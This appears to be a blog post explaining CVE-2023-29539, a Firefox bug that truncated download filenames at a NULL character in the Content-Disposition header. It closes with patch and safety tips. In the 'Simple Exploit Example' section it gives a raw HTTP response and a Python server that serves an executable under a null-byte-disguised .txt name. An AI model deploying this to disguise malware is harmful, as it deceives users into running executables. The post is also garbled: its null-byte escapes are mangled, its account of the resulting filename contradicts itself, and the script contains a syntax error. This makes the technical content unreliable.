CVE-2023-29539 - How a Firefox Filename Truncation Bug Could Trick You Into Downloading Malware

Web browsers do a lot of things to keep us safe. Sometimes, though, bugs slip through and create problems. In early 2023, Mozilla found a vulnerability—tracked as CVE-2023-29539—in Firefox and related products. If a website sent a Content-Disposition header with a filename containing a NULL character (that’s \), Firefox would chop off the filename at that spot. This bug could trick someone into downloading files with misleading names, making it easier for attackers to hide malware.

This post explains how this vulnerability works, why it’s dangerous, and how you can protect yourself.

What Is the Content-Disposition Header?

When you download a file from the internet, the server can suggest to your browser what filename to use with the Content-Disposition header. Here’s what it usually looks like:

Content-Disposition: attachment; filename="my-document.pdf"

Browsers read this header and set the filename so your downloaded file appears as my-document.pdf.

The Bug: NULL Character Truncation

The bug in CVE-2023-29539 occurs when the filename includes a NULL character. Here’s the trick: Computers use the NULL character (\) to mark the end of a string. If this character appears inside a filename, Firefox treated everything after it as if it didn’t exist.

Suppose a malicious server sends this header

Content-Disposition: attachment; filename="safe-file.txt\.exe"

In Firefox before version 112, the browser would ignore anything after the \ and name the file safe-file.txt. But, on the disk, the full filename could actually be safe-file.txt.exe.

Why Is This a Problem?

Many operating systems show only what Firefox presents (like safe-file.txt), not the real file extension (such as .exe—an executable). An attacker could send a program disguised as a text file, and the user might open it, thinking it’s safe.

This trick is called a reflected file download attack—the attacker reflects malicious content right back at you, wrapped in a filename you wouldn’t suspect.

A Simple Exploit Example

Let’s see what an attacker might do in practice.

Server sends

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="important-info.txt\.exe"

[...actual EXE file binary...]

User saves it, maybe thinking it’s just a text file.

- When they double-click, it runs the executable malware as important-info.txt.exe (on Windows systems where extensions are hidden by default).

Here’s a quick Python script for a proof-of-concept (educational purposes only)

from http.server import BaseHTTPRequestHandler, HTTPServer

class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        # Inject NULL (\x00) in header (will need to encode properly for real test)
        self.send_header('Content-Disposition', 'attachment; filename="test.txt\x00.exe"')
        self.end_headers()
        self.wfile.write(open("malicious.exe", "rb").read())

httpd = HTTPServer(('localhost', 800), ExploitHandler)
print("Serving malicious file on http://localhost:800...";)
httpd.serve_forever()

Note: Browsers or servers may block null bytes, so this is here to illustrate the concept.

What Makes This Exploit Dangerous?

- Deceptive filenames: Users see safe.png or info.txt but are actually saving an EXE or other malware.

Triggers user trust: Victims are more likely to open files that look harmless.

- Cross-platform: While most dangerous on Windows, it could affect other systems that mishandle NULLs.

Fixed In

- Firefox 112 Release Notes
- Firefox ESR 102.10 Release Notes
- Thunderbird 102.10 Release Notes

Official References

- Mozilla Security Advisory CVE-2023-29539
- Mozilla Bugzilla Bug 1824291
- Detailed CVE Description

Update your browser: Make sure you use Firefox 112 or later (or other patched releases).

- Watch out for weird downloads: Even “safe” filenames may hide malware. Always double-check files before opening.

Show hidden file extensions: On Windows, enable showing of extensions to reveal real file types.

- Be aware of social engineering: Don’t trust files just because of the name—look at the source and be cautious.

In Summary

CVE-2023-29539 allowed a simple NULL character in a file name to turn a simple browser feature into a dangerous exploit, enabling attackers to hide harmful files behind innocent-looking names. Always keep browsers up to date and stay alert for tricks like these.

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/21/2023 15:33:00 UTC